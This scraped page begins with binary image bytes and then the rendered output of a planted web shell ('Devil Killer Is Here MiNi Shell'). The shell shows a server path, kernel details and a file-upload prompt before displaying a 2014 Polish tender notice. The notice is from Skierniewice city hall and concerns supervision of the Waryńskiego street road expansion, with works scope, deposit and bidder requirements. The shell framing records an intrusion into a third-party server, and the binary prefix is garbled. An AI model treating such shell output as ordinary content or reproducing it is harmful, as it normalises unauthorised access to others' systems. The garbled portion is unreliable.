JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140325/63061-N-2014.html

<p class="kh_header"><b>Skierniewice: Pełnienie nadzoru inwestorskiego nad realizacją zadania pn: 
Rozbudowa ulicy Waryńskiego odc. od ulicy Sierakowickiej do granicy miasta</b><br>
<b>Numer ogłoszenia: 63061 - 2014; data zamieszczenia: 25.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją zadania pn: 
Rozbudowa ulicy Waryńskiego odc. od ulicy Sierakowickiej do granicy miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Nazwa i adres Zamawiającego:
Miasto Skierniewice, ul. Rynek 1, 96-100 Skierniewice, 
strona internetowa:  www.bip.skierniewice.pl
zwane dalej Zamawiającym, 

2. Tryb udzielenia zamówienia:
Przetarg nieograniczony przeprowadzany jest na podstawie art. 39 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013r., poz. 907 z późn. zm.) zwaną dalej ustawą.

3. Opis przedmiotu zamówienia

Wspólny słownik zamówień: (CPV): 71.24.70.00-1- nadzór nad robotami budowlanymi.

3.1.Przedmiotem zamówienia jest: Pełnienie  nadzoru inwestorskiego  nad  realizacją  zadania pn: Rozbudowa ulicy Waryńskiego odc. od ulicy Sierakowickiej do granicy miasta, które będzie zlecane do realizacji zgodnie z ustawą Prawo zamówień publicznych - przewiduje się, że głównym trybem wyboru wykonawcy robót budowlanych jest przetarg nieograniczony. Nadzór inwestorski nad robotami budowlanymi w branżach: drogowa, sanitarna (wodociągowa, kanalizacyjna, drenaż w drodze), elektryczna, telekomunikacyjna.

Zakres planowanych robót orientacyjnie obejmuje:
3.1.1. Branża drogowa: 
a) rozbudowa drogi o długości około: 1298,0 mb na ciągu głównym i około 252,0 mb na ciągach 
    bocznych ,
b) remont drogi o długości około 180,0 mb.

Podstawowe parametry techniczno-użytkowe budowanej i remontowanej drogi:
- kategoria drogi - droga gminna,
- klasa drogi - D,
- kategoria ruchu: na odc. od 0+000,00 do 0+260,00 - KR2;   na odc. od 0+260,00 do 1+297,95 - KR3,
- kategoria ruchu: na odc. od 1+297,95 do 1+477,77 - kategoria nieokreślona - remont nawierzchni,
- nawierzchnia jezdni drogi: na odc. od 0+000,00 do 0+261,50 - z kostki betonowej o szerokości 5,5 m;  
   na odc. od 0+ 261,50 do 1+297,95 - asfaltowa o szerokości jezdni 6,0 m;  na odc. od 1+297,95 do 
   1+477,77 - szerokość istniejąca ok. 7,5 m,
- chodnik jednostronny z kostki betonowej o szerokości: na odcinku od 0+000,00 do 0+298,50 - 1,5 m;  
   na odcinku od 0+298,50 do 1+298,00 - 2,0 m,
- zjazdy do działek przyległych w granicach pasa drogowego,
- odwodnienie za pomocą projektowanej kanalizacji deszczowej z dwoma odprowadzeniami: do rzeki
  Łupii i do rowu,
- przebudowa i modernizacja oświetlenia ulicznego polegająca na wymianie wysięgników i opraw 
   oświetleniowych, na nowych słupach i na istniejących słupach,
- przebudowa odcinków wodociągu z przyłączami, kolidującego z rozbudową drogi,
- przebudowa istniejącej infrastruktury elektroenergetycznej niskiego napięcia, kolidującej z rozbudową 
   drogi,
- przebudowa sieci teletechnicznej, kolidującej z rozbudową drogi,
- wykonanie zieleni (sadzenie drzew i krzewów).

3.1.2. Branża telekomunikacyjna
Wbudowane zostaną nowe słupy telekomunikacyjne - 8 szt., kable ziemne - 137 mb oraz linie napowietrzne - 401 mb. Istniejące telekomunikacyjne kable napowietrzne na słupach telekomunikacyjnych i energetycznych zostaną przebudowane na nowe słupy. Nieczynne odcinki sieci napowietrznej zostaną zdemontowane. 

3.1.3. Branża elektryczna
Wykonana zostanie:
a) przebudowa istniejącej infrastruktury elektroenergetycznej niskiego napięcia, będącej w zarządzie PGE Dystrybucja S.A. Oddział Łódź-Teren RE Żyrardów, polegająca na:
- przesunięciu 20 szt. słupów sieci napowietrznej oraz ustawienie nowych słupów,
- przełożenie istniejących przyłączy kablowych - 7 szt.,
- wymianie istniejących przyłączy napowietrznych - 18 szt.,
- przełożeniu istniejącej sieci kablowej o długości całkowitej około 505,0 m. 

b) przebudowa istniejącej infrastruktury elektroenergetycznej niskiego napięcia, będącej w zarządzie Zakładu Wodociągów i Kanalizacji WOD-KAN sp. z o.o. W Mokrej Prawej, polegająca na przełożeniu istniejącej sieci kablowej o całkowitej długości około 1162,0 m. 

c) przebudowa (modernizacja) istniejącego oświetlenia ulicznego, polegająca na:
- wymianie i zainstalowaniu dodatkowych opraw oświetleniowych z wysięgnikami - 51 szt.,
- ułożeniu sieci kablowej o dł. około 64 m.

3.1.4. Branża sanitarna - kanalizacja deszczowa i drenaż 
Wykonana zostanie:
- kanalizacja deszczowa o średnicach: O 200 mm, O 300 mm, O 400 mm, O 500 mm, O 600 mm, O 800 
   mm - o łącznej dł. około 1755,0 m,
- studzienki kanalizacyjne PEHD O 1200 mm i O  1400 mm, w łącznej ilości 64 szt.,
- wpusty uliczne PEHD O 500 mm w łącznej ilości 91 szt.,
- korekta wysokościowa, wymiana włazów i montaż pierścieni odciążających dla studni kanalizacji  
   sanitarnej i deszczowej,
- dwa wyloty kanalizacji deszczowej: do rzeki i do rowu, z separatorami,
- drenaż z rur PCV-U O 113 mm o dł. około 688,0 m,
- studzienki drenażowe - 15 szt.

3.1.5. Branża sanitarna - przebudowa sieci wodociągowej
Wykonana zostanie:
- przebudowa odcinków wodociągu z rur O 110 PE100, SDR17, PN10 z zasuwami odcinającymi -            
  560,0 m,
- przepięcie istniejących przyłączy wodociągowych,
- hydranty p.poż. - 3 szt.

Szczegółowy opis robót budowlanych został zawarty w dokumentacji projektowej na wykonanie zadania pn. Rozbudowa ulicy Waryńskiego odc. od ulicy Sierakowickiej do granicy miasta oraz                  w Specyfikacjach Technicznych Wykonania i Odbioru Robót, które są dostępne w Wydziale Dróg                     i Komunikacji Urzędu Miasta Skierniewice przy ul. Floriana 9 w pokoju nr 12 oraz na stronie internetowej BIP UM Skierniewice.

3.2.  W ramach niniejszego zamówienia Inspektor nadzoru zobowiązuje się  do:

3.2.1. 	Reprezentowania Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej.
3.2.2. 	Współpracy z projektantem, w tym do egzekwowania usunięcia ewentualnych usterek                 w dokumentacji projektowej.
3.2.3. 	Przygotowywania, sporządzania i dostarczania dla Zamawiającego wszelkich informacji i opinii, dokumentów związanych z realizacją inwestycji w tym z zakresu rzeczowo-finansowego, a także bieżącej kontroli zgodności wykonywanych prac z harmonogramem rzeczowo-finansowym robót.
3.2.4. 	Podejmowania działań w celu dotrzymania terminu realizacji budowy.
3.2.5. 	Nadzorowania wypełniania warunków umowy zawartej pomiędzy zamawiającym a Wykonawcą robót.
3.2.6. 	Podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) receptur, materiałów, prefabrykatów - w tym mieszanek mineralno-bitumicznych, betonów do wszystkich elementów, sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o przepisy, normy oraz wymagania sformułowane w umowie z Wykonawcą robót, w dokumentacji projektowej                          i specyfikacjach technicznych.
3.2.7. 	Przeprowadzania kontroli laboratorium Wykonawcy w celu sprawdzenia, czy stosowane urządzenia pomiarowe i sprzęt laboratoryjny Wykonawcy posiadają ważną legalizację, zostały prawidłowo wykalibrowanie i odpowiadają wymogom norm określających procedurę badań, uczestniczenia w badaniach przeprowadzanych w tym laboratorium przez Wykonawcę w czasie trwania budowy.
3.2.8. 	Zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie                   z warunkami umowy i dokumentacją projektową dla wszystkich asortymentów robót.
3.2.9. 	Sprawdzania jakości wykonywanych robót, wbudowanych wyrobów budowlanych,                        a w szczególności zapobiegania zastosowaniu wyrobów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania w budownictwie, kontroli i archiwizacji dokumentów potwierdzających dopuszczenie tych materiałów do obrotu.
3.2.10. 	Sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia 	w próbach i odbiorach technicznych sieci i urządzeń technicznych.
3.2.11. Wydawania kierownikowi budowy lub kierownikom robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, 	także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz  dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do 	obrotu     i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych.
3.2.12. 	Żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót.
3.2.13. Kontrolowania jakości i terminowości wykonywanych robót:
kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót
uczestniczenie w dokonywaniu odbiorów częściowych inwestycji,
przygotowanie zadania inwestycyjnego do odbioru końcowego - sprawdzenie i zatwierdzenie dokumentacji powykonawczej (operatu kolaudacyjnego), w tym powykonawczej dokumentacji geodezyjnej,
sprawdzanie faktur wykonawcy oraz dokumentów załączonych do rozliczenia robót,
dokonywanie rozliczeń merytorycznych i finansowych wykonanych prac w imieniu Zamawiającego, a także sporządzenie pełnego rozliczenia finansowego nadzorowanej inwestycji,
dokonanie odbioru inwestycji po upływie terminu gwarancji ustalonego w umowie z wykonawcą robót budowlanych,
uczestnictwo w komisjach do stwierdzenia ewentualnych wad w okresie rękojmi oraz nadzór nad naprawami wad ujawnionych w okresie rękojmi i gwarancji.
3.2.14. 	Inspektor nadzoru zobowiązany jest do składania sprawozdań z realizacji inwestycji na wniosek 	Zamawiającego oraz będzie informował na bieżąco Zamawiającego o przebiegu prac                                                        
             i ewentualnych zagrożeniach w realizacji inwestycji.
3.2.15. 	Inspektor nadzoru zobowiązany jest do nadzorowania budowy w takich odstępach czasu, aby 		była zapewniona skuteczność nadzoru, jednak nie rzadziej niż 3 razy w tygodniu oraz na
             każde żądanie Zamawiającego - Inwestora, a w sytuacjach wyjątkowych niezwłocznie, gdy
             obecność Inspektora nadzoru będzie nieodzowna najpóźniej w przeciągu 3 godzin.
Każdorazowy pobyt na placu budowy winien być potwierdzony wpisem do dziennika budowy.
3.2.16. 	Inspektor nadzoru zobowiązany jest posiadać telefon komórkowy i samochód do dyspozycji.

Pełen zakres czynności Inspektora Nadzoru określony jest w Ustawie z dnia 7 lipca 1994 roku Prawo budowlane - (tekst jednolity Dz.U. z 2013r.  Poz. 1409 z późn.zm.) 
Inspektor nadzoru branży drogowej będzie pełnił funkcję koordynatora inspektorów nadzoru wszystkich pozostałych branż - zgodnie z art. 27 w/w ustawy Prawo budowlane.

4.  Termin wykonania zamówienia

Zamówienie będzie wykonywane w okresie od podpisania umowy w sprawie pełnienia nadzoru inwestorskiego oraz złożenia oświadczenia o podjęciu obowiązków inspektora nadzoru inwestorskiego do zakończenia robót, przez które rozumie się łączne spełnienie następujących warunków: dokonanie przez Inwestora odbioru końcowego zadania inwestycyjnego jakim jest Rozbudowa ulicy Waryńskiego odc. od ulicy Sierakowickiej do granicy miasta oraz rozliczenie robót fakturą końcową.
W ramach umowy na pełnienie nadzoru inwestorskiego Inspektor nadzoru jest też zobowiązany do brania udziału w odbiorach w trakcie przeglądów w okresie rękojmi i gwarancji, a także                           we wszystkich innych przeglądach i odbiorach robót na wezwanie Zamawiającego.  
Przewidywany termin zakończenia robót budowlanych - 31 października 2014 r. Termin gwarancji na rozbudowę ulicy Waryńskiego odc. od ulicy Sierakowickiej do granicy miasta wynosi 48 miesięcy od daty odbioru końcowego robót..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do udzielonego zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt 6 ustawy Pzp, polegających na zwiększeniu zakresu wykonywanych czynności nadzoru inwestorskiego, będących wynikiem zwiększenia zakresów nadzorowanych robót budowlanych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości           3 000,00 zł brutto (słownie: trzy tysiące złotych brutto).
2. 	Wadium powinno być wniesione najpóźniej w terminie do 02.04.2014 r. do godziny 11:30
3. 	Wadium może być wniesione w formach przewidzianych w art. 45. ust. 6. ustawy Pzp.
4. 	Wadium w pieniądzu należy wpłacić na rachunek bankowy o nr konta: Powszechna Kasa Oszczędności Bank Polski SA nr 81 1020 3352 0000 1402 0193 3969 z dopiskiem RZP - wadium do przetargu pn. Pełnienie nadzoru inwestorskiego nad realizacją zadania pn:   Rozbudowa ulicy Waryńskiego odc. od ulicy Sierakowickiej do granicy miasta.
5. 	Zamawiający będzie przechowywał wadium wniesione w pieniądzu na rachunku bankowym i jego zwrot nastąpi zgodnie z art.46 ust. 4 ustawy Pzp.
6. 	Wadium w innych dopuszczonych formach należy wnieść w kasie Urzędu Miasta Skierniewice.
7. 	Zwrot wadium nastąpi w przypadkach i na warunkach przewidzianych w art. 46 ustawy Pzp.
8. 	Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach przewidzianych w art. 46 ust. 4a i 5 ustawy Pzp.
9. 	Wadium należy wnieść na okres związania ofertą.
10.Dowód wniesienia wadium należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: - spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 ustawy Pzp, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, - nie podlegają wykluczeniu na podstawie art. 24 ust 1 ustawy Pzp, - spełniają warunki zawarte w niniejszej SIWZ oraz dostarczą oświadczenia i dokumenty wymagane przez Zamawiającego. Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt.2 ustawy Pzp, dotyczący posiadania wiedzy i doświadczenia za spełniony, jeżeli wykonawca wykaże co najmniej dwie usługi polegające na sprawowaniu nadzoru nad robotami budowlanymi polegającymi na budowie lub rozbudowie lub przebudowie drogi (wraz z robotami towarzyszącymi) wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat i podmiotów na rzecz których usługi zostały wykonane o wartości każdej usługi nie mniejszej niż 90 000,00 zł brutto (dziewięćdziesiąt tysięcy złotych brutto) a wartość każdej roboty (wraz z robotami towarzyszącymi) wynosiła nie mniej niż 6 000 000,00 zł brutto (słownie: sześć milionów złotych brutto), z jednoczesnym pisemnym potwierdzeniem należytego wykonania tych usług, bądź innych dokumentów równoważnych - zgodnie z załącznikiem nr 6. Wykonawca do oferty winien załączyć: Wykaz wykonanych lub wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, co najmniej dwóch usług polegających na sprawowaniu nadzoru nad robotami budowlanymi polegającymi na budowie lub rozbudowie lub przebudowie drogi o wartości każdej usługi nie mniejszej niż 90 000,00 zł brutto (dziewięćdziesiąt tysięcy złotych brutto) a wartość każdej roboty (wraz z robotami towarzyszącymi) wynosiła nie mniej niż 6 000 000,00 zł brutto (sześć milionów złotych brutto) podobnych z rodzaju do przedmiotu zamówienia - zgodnie z załącznikiem nr 6. Za roboty podobne z rodzaju do przedmiotu zamówienia uznaje się wykonanie budowy lub rozbudowy lub przebudowy drogi (wraz z robotami towarzyszącymi) o wartości minimum 6 000 000,00 zł brutto. Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek o którym mowa w art. 22 ust.1 pkt 3 ustawy pzp dotyczący dysponowania odpowiednim potencjałem technicznym, jeżeli wykonawca złoży oświadczenie - załącznik nr 2 do SIWZ. Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek określony w art. 22 ust. 1 pkt 3 ustawy Pzp dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia jeżeli wykonawca wykaże: W zakresie osób zdolnych do wykonania zamówienia wymagane jest wykazanie osoby lub osób posiadających uprawnienia do kierowania i nadzorowania robotami budowlanymi w specjalnościach: . drogowej, . sanitarnej (wodociągowej, kanalizacyjnej w tym i dla wykonania drenażu w drodze), . elektrycznej w zakresie budowy sieci . telekomunikacyjnej w zakresie budowy sieci. Wykonawca do oferty winien załączyć:Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 4. Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek określony w art. 22 ust. 1 pkt 4 ustawy Pzp, dotyczący sytuacji ekonomicznej i finansowej, Zamawiający uzna za spełniony, jeżeli Wykonawca przedstawi opłaconą polisę OC w zakresie prowadzonej działalności, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia w wysokości minimum 90 000,00 zł (słownie: dziewięćdziesiąt tysięcy złotych). Wykonawca do oferty winien załączyć: opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na co najmniej 90 000,00 zł (słownie: dziewięćdziesiąt tysięcy złotych). Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
